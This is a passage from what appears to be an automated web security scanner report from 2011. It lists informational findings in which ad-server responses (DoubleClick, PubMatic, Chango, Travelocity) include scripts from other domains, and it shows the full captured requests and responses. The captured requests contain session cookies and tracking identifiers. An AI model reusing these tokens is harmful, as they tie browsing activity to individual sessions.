<!-- Code auto-generated on Wed Sep 21 16:47:44 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript><script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script277.js?agnc=900745&cmp=5912738&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=72099485&advid=2590120&sid=902003&adid='></script>
...[SNIP]...
20.3. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.30  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6054.Invitemedia.com/B5912738.30

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /adi/N6054.Invitemedia.com/B5912738.30;sz=728x90;pc=[TPAS_ID];click=http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOhDAMBL.CXBMpWduxw2_IARW6jgrd38.udkba3ZeYaVuGSxvrQowQNxWktRBCvQA4l30cUqTrUXY7ZznlqlOrf2wy5TTLpqiWlj95oZHc4YES.H3uO7AHNhU2_P7igxtH&redirectURL=;ord=20f22283-a9d4-465d-a7eb-e4f0b508c7b3? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?zoneid=6393&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7636
Date: Sun, 02 Oct 2011 23:59:52 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Mon Sep 26 17:08:53 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
</noscript><script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script277.js?agnc=900745&cmp=5912738&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=72099489&advid=2590120&sid=902003&adid='></script>
...[SNIP]...
20.4. http://ad.doubleclick.net/adi/gna.en/level2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/gna.en/level2

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /adi/gna.en/level2;tile=5;sz=160x600;ord=940345?area=2l&pos=2&league=epl&ord=940345 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 562
Date: Mon, 03 Oct 2011 00:00:10 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script type="text/javascript"><!--
   e9 = new Object();
e9
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Goalcomnew/US/tags.js"></script>
...[SNIP]...
20.5. http://ad.yieldmanager.com/iframe3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /iframe3

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe3?Hv0hAJBoGgAnFoYAAAAAAHwwIgAAAAAAAAD8AQIAAAAAAP8A.wD..ziOJgAAAAAAJtcsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTIxEAAAAAAAIAAgAAAAAAumx0zk9xnD-6bHTOT3GcP6lNnNzvUKQ.qU2c3O9QpD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABThIHDCPrRCk1snMRCLBJSPZqa77.0ztS7XLZNAAAAAA==,,http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html,B%3D10%26Z%3D300x250%26_salt%3D3038281923%26atf%3D1%26brw%3Dcr3%26cb%3D10909902593%26efo%3D0%26os%3Dwn7%26pfm%3D1%26prm%3D0%26r%3D0%26rtg%3Dga%26s%3D1730704%26tphv%3Dch%26ttvl%3Dch%26uatRandNo%3D1419,73842556-ed62-11e0-91db-78e7d1f5a930,1317606792173 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/HostedDefaultTags/26620/26621/21556/559/adtag.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=58vrtql77d133&b=3&s=uc; optout=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:53:13 GMT
Server: YTS/1.19.8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0050.rm.sp2
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 03 Oct 2011 01:53:13 GMT
Pragma: no-cache
Content-Length: 619
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(8787495);}
</script><script type="te
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
20.6. http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pubmatic.com
Path:   /HostedThirdPartyPixels/TF/ae_12232010.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /HostedThirdPartyPixels/TF/ae_12232010.html HTTP/1.1
Host: ads.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; DPFQ=37~4~1315939725; PUBUIDSYNCUPFQ=1~1315939725:4~1315939725; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; SyncRTB=1_1318810146.2_1318291877.3_1318810277.4_1318810277.5_1318810277.6_1318810277.7_1318810277; DPSync=23_1317859746.24_1317859877.25_1317859877.26_1317687077; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; KTPCACOOKIE=YES; pubfreq_26072=823-3:1098-3; PUBMDCID=1; _curtime=1317600804; camfreq_126550188=3663-1_1317687204; pubfreq_26072_21043_618709548=243-1; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:35 GMT
Expires: Tue, 04 Oct 2011 17:44:41 GMT
Last-Modified: Tue, 29 Mar 2011 14:07:54 GMT
Cache-Control: max-age=172800
Content-Type: text/html; charset=UTF-8
ETag: "7b47ce-1da-961de280"
Accept-Ranges: bytes
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Length: 474

<html>

<body>
<script type="text/javascript"><!--
e9 = new Object();
e9.size = "1x1";
//--></script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/PubmaticAE/AudienceSelect/tags.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/AudienceSelectPublishers/AudienceSelect/tags.js"></script>
...[SNIP]...
20.7. http://as.chango.com/links/adunit/1.31759988192e+12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31759988192e+12

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /links/adunit/1.31759988192e+12?adid=13713&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84336389243&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIeco3h8bGWkdw&eid=Rubicon&ht=250&ibs=None&kf=202457&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=5cadceb4-ed52-11e0-ab71-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599881920&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2F2011%2Fsep%2F27%2Fmanchester-united-basel-live&wh=300&wp=869757B4845F780B&sig=d9ce9455d859589baae4652880c0ad93 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_rc=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "01bddffbb814f8450036212edceb90ccd4fe74e8"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2369
Date: Sun, 02 Oct 2011 23:58:03 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834; Domain=chango.com; expires=Wed, 29 Sep 2021 23:58:02 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cguardian.co.uk%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Tue, 01 Nov 2011 23:58:02 GMT; Path=/

<html><head><title></title></head><body style='margin:0;padding:0;'><script type="text/javascript">(new Image()).src = 'http://cm.g.doubleclick.net/pixel?nid=chango&partnerId=&referrerURL=&token=b6ae8
...[SNIP]...
</script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B5866234.13;sz=300x250;ord=1317599882.73;click1=http://as.chango.com/links/click1317599882.73?acid=10699&adid=13713&agid=11720&stid=guardian.co.uk&url=http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live&dom=guardian.co.uk&ibs=None&mw=1.0&poo=p&kwid=5827704&eid=Rubicon&cid=10449&agid=11720&sid=5cadceb4-ed52-11e0-ab71-00259035d426&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.84336389243&wp=1.5592&kw=Malware+freeware&uf=0&kf=202457&atype=HISTORIC&test=0&adpos=0&bidder=bidder05-sj-west&ioi=13672&ts=1317599881920&sig=d9ce9455d859589baae4652880c0ad93&cu=&dsi=None&clickURL=">
</SCRIPT>
...[SNIP]...
20.8. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344§ion=results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:26 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:26 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 2262
Content-Type: text/html

<IFRAME SRC="http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d127075%26AdID%3d169968%26TargetID%3d32592
...[SNIP]...
5,9846,11161,12194,12196,12728,12736,12804%26Redirect%3d;ord=AIsqio,bhirWtczqlse?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6333.1207.TRAVELOCITY.COM/B5568861.2;abr=!ie;sz=160x600;ord=AIsqio,bhirWtczqlse?">
</SCRIPT>
...[SNIP]...
20.9. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219§ion=details  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:46 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:46 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 2276
Content-Type: text/html

<IFRAME SRC="http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d127075%26AdID%3d169968%26TargetID%3d32592
...[SNIP]...
,9906,11162,12194,12196,12728,12736,12804%26Redirect%3d;ord=bNukzwK,bhirWpRzqlhl?" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6333.1207.TRAVELOCITY.COM/B5568861.2;abr=!ie;sz=160x600;ord=bNukzwK,bhirWpRzqlhl?">
</SCRIPT>
...[SNIP]...
20.10. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628§ion=results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:01 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:01 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 239
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21044;
var kadwidth=160;
var kadheight=600;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">
</script>
20.11. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344§ion=results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:28 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:28 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 239
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21044;
var kadwidth=160;
var kadheight=600;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">
</script>
20.12. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344§ion=results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:25 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:25 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 238
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21043;
